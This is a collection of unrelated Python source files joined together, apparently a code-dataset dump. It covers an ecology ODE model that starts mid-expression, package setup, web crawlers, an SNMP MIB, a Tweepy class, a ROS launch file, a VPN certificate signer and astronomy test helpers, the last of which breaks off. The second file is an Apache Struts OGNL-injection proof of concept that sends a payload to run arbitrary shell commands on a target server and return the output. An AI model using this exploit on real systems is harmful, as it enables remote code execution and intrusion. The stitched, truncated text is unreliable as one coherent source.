( 1 + (pJLRS/(HJLRS**(1+q))) * RS**(1+q) + (pJLRL/(HJLRL**(1+q))) * RL**(1+q) ) )
IJLRL = ( ( 0 * (IJLRSmax/(HJLRS**(1+q))) * RS**(1+q) + pJLRL * (IJLRLmax/(HJLRL**(1+q))) * RL**(1+q) ) /
( 1 + (pJLRS/(HJLRS**(1+q))) * RS**(1+q) + (pJLRL/(HJLRL**(1+q))) * RL**(1+q) ) )
IALRL = ( ( 1 * (IALRLmax/(HALRL**(1+q))) * RL**(1+q) ) /
( 1 + (1/(HALRL**(1+q))) * RL**(1+q) ) )
# Stage-specific production rates:
vJS = betaJS*IJSRS - mJS # small juvenile production rate
gammaJS = (vJS - muJS) / (1 - zJSAS**(1-(muJS/vJS))) # maturation rate
vAS = betaAS*(IASRS+IASRL) - mAS # reproduction rate
vJL = betaJL*(IJLRS+IJLRL) - mJL # large juvenile production rate
gammaJL = (vJL - muJL) / (1 - zJLAL**(1-(muJL/vJL))) # maturation rate
vAL = betaAL*IALRL - mAL # reproduction rate
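    # In the ODEs below, the max(., 0)/min(., 0) terms ensure that only positive net
    # production is channelled into reproduction and maturation, while negative net
    # production acts as an additional loss on the stage itself.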
# ODE system:
dRSdt = deltaRS*(RSmax - RS) - IJSRS*JS - IASRS*AS - IJLRS*JL
dRLdt = deltaRL*(RLmax - RL) - IASRL*AS - IJLRL*JL - IALRL*AL
dJSdt = max(vAS,0)*AS + vJS*JS - max(gammaJS,0)*JS - muJS*JS
dASdt = max(gammaJS,0)*JS + min(vAS,0)*AS - muAS*AS
dJLdt = max(vAL,0)*AL + vJL*JL - max(gammaJL,0)*JL - muJL*JL
dALdt = max(gammaJL,0)*JL + min(vAL,0)*AL - muAL*AL
return np.array([dRSdt, dRLdt, dJSdt, dASdt, dJLdt, dALdt])
# Initial densities for RS, RL, JS, AS, JL, AL
X0 = np.array([0.01, 0.01, 0.01, 0.01, 0.01, 0.01])
# Time range
t = np.linspace(0,300,1000)
# Solve ODE
X = odeint(model,X0,t)
# Plot results
RS,RL,JS,AS,JL,AL = np.transpose(X)
plt.figure()
plt.plot(t, RS, 'g-', label='RS', linewidth=1.0)
plt.plot(t, RL, 'g-', label='RL', linewidth=2.5)
plt.legend(loc='upper right')
plt.xlabel('Time (day)')
plt.ylabel('Density (mg/L)')
plt.show()
plt.figure()
plt.plot(t, JS, 'k-', label='JS', linewidth=1.0)
plt.plot(t, AS, 'k-', label='AS', linewidth=2.5)
plt.legend(loc='upper right')
plt.xlabel('Time (day)')
plt.ylabel('Density (mg/L)')
plt.show()
plt.figure()
plt.plot(t, JL, 'k-', label='JL', linewidth=1.0)
plt.plot(t, AL, 'k-', label='AL', linewidth=2.5)
plt.legend(loc='upper right')
plt.xlabel('Time (day)')
plt.ylabel('Density (mg/L)')
plt.show()
|
#coding:utf-8
'''
Test did not succeed
2018/06/27
'''
import sys
import requests
requests.packages.urllib3.disable_warnings()
def poccheck(url, cmd='whoami'):
result = False
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Content-Type': "application/x-www-form-urlencoded"
}
data = "name=${(#o=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#o):((#c=#context['com.opensymphony.xwork2.ActionContext.container']).(#g=#c.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#g.getExcludedPackageNames().clear()).(#g.getExcludedClasses().clear()).(#context.setMemberAccess(#o)))).(#o=@org.apache.EXP.ServletActionContext@getResponse().getOutputStream()).(#p=@java.lang.Runtime@getRuntime().exec('%s')).(@org.apache.commons.io.IOUtils@copy(#p.getInputStream(),#o)).(#o.flush())}&age=1212&__checkbox_bustedBefore=true&description=123" % str(
cmd)
if 'integration' not in url:
url = url + "/EXP-showcase/integration/saveGangster.action"
    try:
        response = requests.post(url, data=data, headers=header, verify=False, allow_redirects=False)
        # Use response.text so the substring check also works on Python 3 (content is bytes there).
        if response.status_code == 200 and 'EXP-showcase' not in response.text:
            result = response.text
    except Exception as e:
        print(str(e))
    return result
if __name__ == '__main__':
url = 'http://127.0.0.1:8083/integration/saveGangster.action'
res = poccheck(url)
    print(res)
|
import os
import sys
from setuptools import setup, find_packages, Command
VERSION = __import__("zmqpy").__version__
install_requires = []
try:
import importlib
except ImportError:
install_requires.append("importlib")
is_pypy = hasattr(sys, "pypy_version_info")
is_cpy = not is_pypy
setup(
name="zmqpy",
version=VERSION,
description="Pure Python 0mq bindings.",
license="MIT",
url="https://github.com/asenchi/zmqpy",
author="Curt Micol",
author_email="asenchi@asenchi.com",
zip_safe=False,
packages=find_packages(),
install_requires=install_requires,
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
)
|
# -*- coding: utf-8 -*-
"""
Created on 2021-03-02 23:42:40
---------
@summary:
---------
@author: Boris
"""
import feapder
class TencentNewsParser(feapder.BatchParser):
"""
    Note: this class inherits from BatchParser, not BatchSpider.
"""
def start_requests(self, task):
task_id = task[0]
url = task[1]
yield feapder.Request(url, task_id=task_id)
def parse(self, request, response):
title = response.xpath("//title/text()").extract_first()
print(self.name, title)
yield self.update_task_batch(request.task_id, 1)
|
import os
from icrawler.builtin import GoogleImageCrawler
from icrawler import ImageDownloader
from six.moves.urllib.parse import urlparse
import base64
def ensure_dir(directory):
if not os.path.exists(directory):
        os.makedirs(directory)
class Base64NameDownloader(ImageDownloader):
def get_filename(self, task, default_ext):
url_path = urlparse(task['file_url'])[2]
if '.' in url_path:
extension = url_path.split('.')[-1]
if extension.lower() not in [
'jpg', 'jpeg'
]:
extension = default_ext
else:
extension = default_ext
# works for python 3
filename = base64.b64encode(url_path.encode()).decode()
filename=filename[0:30]
return '{}.{}'.format(filename, extension)
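# A minimal sketch (not part of icrawler): the filename logic above, reproduced as a
# standalone helper so it can be checked without instantiating a downloader.
# The example URL below is hypothetical.
def _sketch_filename(file_url, default_ext='jpg'):
    url_path = urlparse(file_url)[2]
    extension = url_path.split('.')[-1] if '.' in url_path else default_ext
    if extension.lower() not in ('jpg', 'jpeg'):
        extension = default_ext
    return '{}.{}'.format(base64.b64encode(url_path.encode()).decode()[:30], extension)
# e.g. _sketch_filename('http://example.com/images/cat.png') ends in '.jpg',
# because 'png' is not in the accepted extension list above.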
plants_list=['maranta leuconeura erythroneura','phlebodium pseudoaureum','euphorbia trigona rubra','senecio rowleyanus','crassula ovata','Aloe Vera','Haworthia limifolia','euphorbia triangularis','monstera deliciosa','senecio kleiniiformis','fatsia japonica','calathea orbifolia','calathea lancifolia','ficus elastica','oxalis triangularis','chlorophytum comosum vittatum','pilea peperomioides','ficus lyrata','Persea gratissima','tradescantia zebrina','Tradescantia fluminensis Tricolor','Tradescantia pallida','Sansevieria trifasciata','Dracanea marginata','echeveria elegans','dracaea reflexa']
for plant in plants_list:
ensure_dir('./images/'+plant)
google_crawler = GoogleImageCrawler(parser_threads=2, downloader_threads=4,downloader_cls=Base64NameDownloader,storage={'root_dir': './images/'+plant})
google_crawler.crawl(keyword=plant, max_num=100,date_min=None, date_max=None,min_size=(200,200), max_size=None)
|
#
# PySNMP MIB module CISCO-WLAN-MAN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-WLAN-MAN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:21:27 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Counter64, Counter32, NotificationType, Unsigned32, iso, ModuleIdentity, IpAddress, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Gauge32, Integer32, ObjectIdentity, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Counter32", "NotificationType", "Unsigned32", "iso", "ModuleIdentity", "IpAddress", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Gauge32", "Integer32", "ObjectIdentity", "TimeTicks")
DisplayString, TruthValue, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TextualConvention")
ciscoWlanManMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 415))
ciscoWlanManMIB.setRevisions(('2004-03-22 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoWlanManMIB.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: ciscoWlanManMIB.setLastUpdated('200403220000Z')
if mibBuilder.loadTexts: ciscoWlanManMIB.setOrganization('Cisco System Inc.')
if mibBuilder.loadTexts: ciscoWlanManMIB.setContactInfo(' Cisco Systems Customer Service Postal: 170 West Tasman Drive, San Jose CA 95134-1706. USA Tel: +1 800 553-NETS Email: cs-dot11@cisco.com')
if mibBuilder.loadTexts: ciscoWlanManMIB.setDescription('This MIB module provides network management and configuration support for IEEE 802.11 Wireless LAN devices. ACRONYMS HTTP Hypertext Transfer Protocol.')
ciscoWlanManMIBNotifs = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 0))
ciscoWlanManMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 1))
ciscoWlanManMIBConform = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 2))
cwmDeviceConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 1))
cwmNetworkConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 2))
cwmHttpServerEnabled = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 1, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cwmHttpServerEnabled.setStatus('current')
if mibBuilder.loadTexts: cwmHttpServerEnabled.setDescription("This object enables the HTTP Web server as follows: 'true' - HTTP Web server function is enabled, 'false' - HTTP Web server function is disabled.")
cwmTelnetLoginEnabled = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 1, 2), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cwmTelnetLoginEnabled.setStatus('current')
if mibBuilder.loadTexts: cwmTelnetLoginEnabled.setDescription("This object enables the telnet console login as follows: 'true' - telnet console login is enabled, 'false' - telnet console login is disabled.")
ciscoWlanManMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 1))
ciscoWlanManMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 2))
ciscoWlanManMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 1, 1)).setObjects(("CISCO-WLAN-MAN-MIB", "cwmWirelessDeviceGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWlanManMIBCompliance = ciscoWlanManMIBCompliance.setStatus('current')
if mibBuilder.loadTexts: ciscoWlanManMIBCompliance.setDescription('The compliance statement for the ciscoWlanManMIB module.')
cwmWirelessDeviceGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 2, 1)).setObjects(("CISCO-WLAN-MAN-MIB", "cwmHttpServerEnabled"), ("CISCO-WLAN-MAN-MIB", "cwmTelnetLoginEnabled"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cwmWirelessDeviceGroup = cwmWirelessDeviceGroup.setStatus('current')
if mibBuilder.loadTexts: cwmWirelessDeviceGroup.setDescription('Configuration for Wireless LAN Access Points and bridges.')
mibBuilder.exportSymbols("CISCO-WLAN-MAN-MIB", cwmWirelessDeviceGroup=cwmWirelessDeviceGroup, cwmHttpServerEnabled=cwmHttpServerEnabled, cwmTelnetLoginEnabled=cwmTelnetLoginEnabled, ciscoWlanManMIBObjects=ciscoWlanManMIBObjects, ciscoWlanManMIB=ciscoWlanManMIB, cwmNetworkConfig=cwmNetworkConfig, ciscoWlanManMIBConform=ciscoWlanManMIBConform, PYSNMP_MODULE_ID=ciscoWlanManMIB, ciscoWlanManMIBNotifs=ciscoWlanManMIBNotifs, cwmDeviceConfig=cwmDeviceConfig, ciscoWlanManMIBGroups=ciscoWlanManMIBGroups, ciscoWlanManMIBCompliance=ciscoWlanManMIBCompliance, ciscoWlanManMIBCompliances=ciscoWlanManMIBCompliances)
|
# Tweepy
# Copyright 2009-2022 Joshua Roesslein
# See LICENSE for details.
from tweepy.mixins import DataMapping, HashableID
class Place(HashableID, DataMapping):
"""The place tagged in a Tweet is not a primary object on any endpoint, but
can be found and expanded in the Tweet resource.
The object is available for expansion with ``?expansions=geo.place_id`` to
get the condensed object with only default fields. Use the expansion with
the field parameter: ``place.fields`` when requesting additional fields to
complete the object.
.. versionadded:: 4.0
Attributes
----------
data : dict
The JSON data representing the place.
full_name : str
A longer-form detailed place name.
id : str
The unique identifier of the expanded place, if this is a point of
interest tagged in the Tweet.
contained_within : list
Returns the identifiers of known places that contain the referenced
place.
country : str | None
The full-length name of the country this place belongs to.
country_code : str | None
The ISO Alpha-2 country code this place belongs to.
geo : dict | None
Contains place details in GeoJSON format.
name : str | None
The short name of this place.
place_type : str | None
        Specifies the particular type of information represented by this place,
        such as a city name or a point of interest.
References
----------
https://developer.twitter.com/en/docs/twitter-api/data-dictionary/object-model/place
"""
__slots__ = (
"data", "full_name", "id", "contained_within", "country",
"country_code", "geo", "name", "place_type"
)
def __init__(self, data):
self.data = data
self.full_name = data["full_name"]
self.id = data["id"]
self.contained_within = data.get("contained_within", [])
self.country = data.get("country")
self.country_code = data.get("country_code")
self.geo = data.get("geo")
self.name = data.get("name")
self.place_type = data.get("place_type")
def __repr__(self):
return f"<Place id={self.id} full_name={self.full_name}>"
def __str__(self):
return self.full_name
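# A minimal usage sketch (not part of Tweepy): constructing a Place from the kind of
# dict returned in a Tweet's ``includes.places`` expansion. The field values below
# are made up for illustration.
if __name__ == "__main__":
    sample = {
        "full_name": "Manhattan, NY",
        "id": "01a9a39529b27f36",
        "country": "United States",
        "country_code": "US",
        "name": "Manhattan",
        "place_type": "city",
    }
    place = Place(sample)
    print(repr(place))         # <Place id=01a9a39529b27f36 full_name=Manhattan, NY>
    print(place.country_code)  # US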
|
# Copyright (c) 2020 OUXT Polaris
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
from launch.substitutions import LaunchConfiguration
from launch.actions import DeclareLaunchArgument
def generate_launch_description():
robotx_twist_controller_parm_file = LaunchConfiguration(
'robotx_twist_controller_parm_file',
default=os.path.join(
get_package_share_directory('robotx_twist_controller'),
'config', 'robotx_twist_controller.yaml')
)
description = LaunchDescription([
DeclareLaunchArgument(
'robotx_twist_controller_parm_file',
default_value=robotx_twist_controller_parm_file,
description='robotx_twist_controller parameters'
),
Node(
package='robotx_twist_controller',
node_executable='robotx_twist_controller_node',
node_name='robotx_twist_controller',
parameters=[robotx_twist_controller_parm_file],
output='screen')
])
return description
|
from vpncert import vpncert
import smtplib
import os
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import formatdate
from email import Encoders
from os.path import basename
from glob import glob
import zipfile
from tempfile import mkdtemp
import subprocess
import logging
import os.path
from shutil import move, copy, rmtree
from django.conf import settings
from django.template.loader import render_to_string
from git import *
class repository(object):
def prepare_repository(self):
try:
repo = Repo(settings.KEYPATH)
except InvalidGitRepositoryError:
            logging.debug("Initializing a new Git repository")
repo = Repo.init(settings.KEYPATH)
try:
            o = repo.remotes.origin
logging.debug("Running Git pull")
o.pull()
except:
logging.debug("No origin defined for Git repository")
def finish_repository(self, message):
repo = Repo(settings.KEYPATH)
logging.debug("Running git add")
"""
GitPython's untracked_files doesn't work at the moment. Using subprocess is a workaround
until the official fix can be found from pypi.
"""
args = ["git", "add", "-A"]
pid = subprocess.Popen(args, cwd=settings.KEYPATH)
pid.wait()
index = repo.index
index.commit(message)
try:
            o = repo.remotes.origin
logging.debug("Running Git push")
o.push()
except:
logging.debug("No origin defined for Git repository")
class sign(object):
def __init__(self, csrfile, username):
self.password = settings.CA_PASSWORD
self.certmanager = vpncert(username)
self.csrfile = csrfile
self.valid = True
if not os.path.exists(csrfile):
self.valid = False
return
status, errors, fields = self.certmanager.validatecert(csrfile)
if not status:
self.valid = False
return
self.fields = fields
self.repository = repository()
def get_cn(self):
if not self.valid:
return
return self.fields["common_name"]
def sign(self):
if not self.valid:
logging.error("Trying to run sign with invalid setup")
return self.valid
self.repository.prepare_repository()
cn = self.fields['common_name']
move(self.csrfile, "%s/%s.csr" % (settings.KEYPATH, cn))
args = ["openssl", "ca", "-batch", "-days", "365", "-out", "%s/%s.crt"
% (settings.KEYPATH, cn), "-in", "%s/%s.csr" % (settings.KEYPATH, cn),
"-md", "sha1", "-config", settings.OPENSSL_CNF_PATH,
"-passin", "pass:%s" % self.password]
pid = subprocess.Popen(args, env=settings.KEY_ENV_VARIABLES)#, stdout=subprocess.PIPE)
(stdoutmsg, stderrmsg) = pid.communicate()
self.repository.finish_repository("Added certificate for %s" % cn)
return (True, stdoutmsg)
def revoke(self):
if not self.valid:
return self.valid
self.repository.prepare_repository()
cn = self.fields['common_name']
if not os.path.exists("%s/%s.crt" % (settings.KEYPATH, cn)):
# No old crt available -> no reason to revoke
return False
args = ["openssl", "ca", "-revoke", "%s/%s.crt"
% (settings.KEYPATH, cn), "-config", settings.OPENSSL_CNF_PATH,
"-passin", "pass:%s" % self.password]
pid = subprocess.Popen(args, env=settings.KEY_ENV_VARIABLES)#, stdout=subprocess.PIPE)
(stdoutmsg, stderrmsg) = pid.communicate()
args = ["openssl", "ca", "-gencrl", "-out", "%s/crl.pem"
% settings.KEYPATH, "-config", settings.OPENSSL_CNF_PATH,
"-passin", "pass:%s" % self.password]
pid = subprocess.Popen(args, env=settings.KEY_ENV_VARIABLES)#, stdout=subprocess.PIPE)
(stdoutmsg, stderrmsg) = pid.communicate()
self.repository.finish_repository("Revoked certificate %s" % cn)
def pack(self):
if not self.valid:
return self.valid
cn = self.fields['common_name']
MACCONF = """client
dev tap
proto udp
remote %s
resolv-retry infinite
nobind
persist-key
persist-tun
ca %s
cert %s.crt
key %s.key
ns-cert-type server
cipher AES-256-CBC
comp-lzo"""
LINUXCONF = """client
dev tap
proto udp
remote %s
resolv-retry infinite
nobind
persist-key
persist-tun
ca /path/to/%s
cert /path/to/%s.crt
key /path/to/%s.key
ns-cert-type server
cipher AES-256-CBC
comp-lzo"""
WINDOWSCONF = """client
dev tap
proto udp
remote %s
resolv-retry infinite
nobind
persist-key
persist-tun
ca %s
cert %s.crt
key %s.key
ns-cert-type server
cipher AES-256-CBC
comp-lzo"""
tempdir = mkdtemp()
for endpoint, name in settings.VPN_ENDPOINTS:
f = open(tempdir+"/futurice-windows-%s.ovpn" % name, "w")
f.write(WINDOWSCONF % (endpoint, settings.CA_PEM_FILE_NAME, cn, cn))
f.close()
f = open(tempdir+"/futurice-mac-%s.conf" % name, "w")
f.write(MACCONF % (endpoint, settings.CA_PEM_FILE_NAME, cn, cn))
f.close()
f = open(tempdir+"/futurice-linux-%s.conf" % name, "w")
f.write(LINUXCONF % (endpoint, settings.CA_PEM_FILE_NAME, cn, cn))
f.close()
copy("%s/%s.crt" % (settings.KEYPATH, cn), tempdir+"/%s.crt" % cn)
copy("%s/%s" % (settings.KEYPATH, settings.CA_PEM_FILE_NAME), "%s/%s"
% (tempdir, settings.CA_PEM_FILE_NAME))
zip = zipfile.ZipFile(settings.PROJECT_ROOT + "/vpn/static/zip/%s.zip"
% cn, "w")
for filename in glob("%s/*" % tempdir):
zip.write(filename, basename(filename))
zip.close()
rmtree(tempdir)
def send(self, email):
if not self.valid:
return self.valid
cn = self.fields['common_name']
text = render_to_string('mails/sertificate_confirm.txt')
msg = MIMEMultipart()
msg['From'] = settings.EMAIL_FROM
msg['To'] = email
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = settings.SERTIFICATE_MAIL_SUBJECT % cn
msg.attach( MIMEText(text) )
zip_filename = settings.PROJECT_ROOT + "/vpn/static/zip/%s.zip" % cn
logging.debug("Adding mime attachment from %s" % zip_filename)
part = MIMEBase('application', "octet-stream")
part.set_payload( open(zip_filename, "rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s.zip"' % cn)
msg.attach(part)
logging.debug("Sending email to %s with subject %s"
% (msg["To"], msg["Subject"]))
smtp = smtplib.SMTP(settings.SMTP)
smtp.sendmail(settings.EMAIL_FROM, email, msg.as_string())
smtp.close()
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2010-2018 CNRS / Centre de Recherche Astrophysique de Lyon
Copyright (c) 2016-2018 Simon Conseil <simon.conseil@univ-lyon1.fr>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import astropy.units as u
import numpy as np
import os
from mpdaf.obj import Image, Cube, WCS, WaveCoord, Spectrum
from numpy.testing import assert_array_equal, assert_allclose
from os.path import join
DEFAULT_SHAPE = (10, 6, 5)
DATADIR = join(os.path.abspath(os.path.dirname(__file__)), '..', 'data')
def get_data_file(*paths):
return join(DATADIR, *paths)
def assert_image_equal(ima, shape=None, start=None, end=None, step=None):
"""Raise an assertion error if the characteristics of a given image
don't match the specified parameters.
Parameters
----------
ima : `mpdaf.obj.Image`
The image to be tested.
shape : tuple
The shape of the data array of the image.
start : tuple
The [y,x] coordinate of pixel [0,0].
end : tuple
The [y,x] coordinate of pixel [-1,-1].
step : tuple
The pixel step size in [x,y].
"""
if shape is not None:
assert_array_equal(ima.shape, shape)
if start is not None:
assert_array_equal(ima.get_start(), start)
if end is not None:
assert_array_equal(ima.get_end(), end)
if step is not None:
assert_array_equal(ima.get_step(), step)
def assert_masked_allclose(d1, d2, **kwargs):
"""Compare the values of two masked arrays"""
if d1 is not None or d2 is not None:
# Check that the two arrays have the same shape.
assert_array_equal(d1.shape, d2.shape)
# Check that they have identical masks.
if d1.mask is np.ma.nomask or d2.mask is np.ma.nomask:
assert d2.mask is d1.mask
else:
assert_array_equal(d1.mask, d2.mask)
# Check that unmasked values in the array are approximately equal.
assert_allclose(np.ma.filled(d1, 0.0), np.ma.filled(d2, 0.0), **kwargs)
def _generate_test_data(data=2.3, var=1.0, mask=None, shape=None, unit=u.ct,
uwave=u.angstrom, wcs=None, wave=None, copy=True,
ndim=None, crpix=2.0, cdelt=3.0, crval=0.5):
# Determine a shape for the data and var arrays. This is either a
# specified shape, the shape of a specified data or var array, or
# the default shape.
if shape is None:
if isinstance(data, np.ndarray):
shape = data.shape
ndim = data.ndim
elif isinstance(var, np.ndarray):
shape = var.shape
ndim = var.ndim
elif isinstance(mask, np.ndarray):
shape = mask.shape
ndim = mask.ndim
elif ndim is not None:
if ndim == 1:
shape = DEFAULT_SHAPE[0]
elif ndim == 2:
shape = DEFAULT_SHAPE[1:]
elif ndim == 3:
shape = DEFAULT_SHAPE
else:
raise ValueError('Missing shape/ndim specification')
if np.isscalar(shape):
shape = (shape,)
if len(shape) != ndim:
raise ValueError('shape does not match the number of dimensions')
# Convert the data and var arguments to ndarray's
if data is None:
if ndim == 1:
# Special case for spectra ...
data = np.arange(shape[0], dtype=float)
data[0] = 0.5
elif np.isscalar(data):
data = data * np.ones(shape, dtype=type(data))
elif data is not None:
data = np.array(data, copy=copy)
assert shape == data.shape
if np.isscalar(var):
var = var * np.ones(shape, dtype=type(var))
elif var is not None:
var = np.array(var, copy=copy)
assert shape == var.shape
if mask is None:
mask = False
if not np.isscalar(mask):
mask = np.array(mask, copy=copy, dtype=bool)
assert shape == mask.shape
# Substitute default world-coordinates where not specified.
if ndim == 2:
wcs = wcs or WCS(crval=(0, 0), crpix=1.0, shape=shape)
elif ndim == 3:
wcs = wcs or WCS(crval=(0, 0), crpix=1.0, shape=shape[1:])
# Substitute default wavelength-coordinates where not specified.
if ndim in (1, 3):
wave = wave or WaveCoord(crpix=crpix, cdelt=cdelt, crval=crval,
shape=shape[0], cunit=uwave)
if wave.shape is None:
wave.shape = shape[0]
if ndim == 1:
cls = Spectrum
elif ndim == 2:
cls = Image
elif ndim == 3:
cls = Cube
return cls(data=data, var=var, mask=mask, wave=wave, wcs=wcs,
unit=unit, copy=copy, dtype=None)
def generate_image(data=2.0, var=1.0, mask=None, shape=None,
unit=u.ct, wcs=None, copy=True):
"""Generate a simple image for unit tests.
The data array can either be specified explicitly, or its shape
can be specified along with a constant value to assign to its
elements. Similarly for the variance and mask arrays. If one or
more of the data, var or mask array arguments are provided, their
shapes must match each other and the optional shape argument.
Parameters
----------
data : float or numpy.ndarray
Either a 2D array to assign to the image's data array, or a float
to assign to each element of the data array.
var : float or numpy.ndarray
Either a 2D array to assign to the image's variance array, a float
to assign to each element of the variance array, or None if no
variance array is desired.
mask : Either a 2D boolean array to use to mask the data array, a
boolean value to assign to each element of the mask array, or
None, to indicate that all data values should be left unmasked.
shape : tuple of 2 integers
Either None, or the shape to give the data and variance arrays.
If either data or var are arrays, this must match their shape.
If shape==None and neither data nor var are arrays, (6,5) is used.
unit : `astropy.units.Unit`
The units of the data.
wcs : `mpdaf.obj.WCS`
The world coordinates of image pixels.
copy : boolean
If true (default), the data, variance and mask arrays are copied.
"""
return _generate_test_data(data=data, var=var, mask=mask, shape=shape,
unit=unit, wcs=wcs, copy=copy, ndim=2)
def generate_spectrum(data=None, var=1.0, mask=None, shape=None,
uwave=u.angstrom, crpix=2.0, cdelt=3.0,
crval=0.5, wave=None, unit=u.ct, copy=True):
"""Generate a simple spectrum for unit tests.
The data array can either be specified explicitly, or its shape
can be specified along with a constant value to assign to its
elements. Similarly for the variance and mask arrays. If one or
more of the data, var or mask array arguments are provided, their
shapes must match each other and the optional shape argument.
Parameters
----------
data : float or numpy.ndarray
Either a 1D array to assign to the spectrum's data array,
a float to assign to each element of the data array, or
None to substitute the default spectrum (0.5, 1, 2, 3 ...).
var : float or numpy.ndarray
Either a 1D array to assign to the spectrum's variance array,
a float to assign to each element of the variance array,
or None if no variance array is desired.
mask : Either a 1D boolean array to use to mask the data array, a
boolean value to assign to each element of the mask array, or
None, to indicate that all data values should be left unmasked.
shape : int
Either None, or the size to give the data and variance arrays.
If either data, var or mask are arrays, this must match their shape.
If shape==None and neither data, var, nor mask are arrays, 10 is used.
uwave : `astropy.units.Unit`
The units to use for wavelengths.
crpix : float
The reference pixel of the spectrum.
cdelt : float
The step in wavelength between pixels.
crval : float
The wavelength of the reference pixel.
wave : `mpdaf.obj.WaveCoord`
The wavelength coordinates of spectral pixels.
unit : `astropy.units.Unit`
The units of the data.
copy : boolean
If true (default), the data, variance and mask arrays are copied.
"""
return _generate_test_data(data=data, var=var, mask=mask, shape=shape,
uwave=uwave, wave=wave, copy=copy, ndim=1,
crpix=crpix, cdelt=cdelt, crval=crval)
def generate_cube(data=2.3, var=1.0, **kwargs):
"""Generate a simple cube for unit tests.
The data array can either be specified explicitly, or its shape
can be specified along with a constant value to assign to its
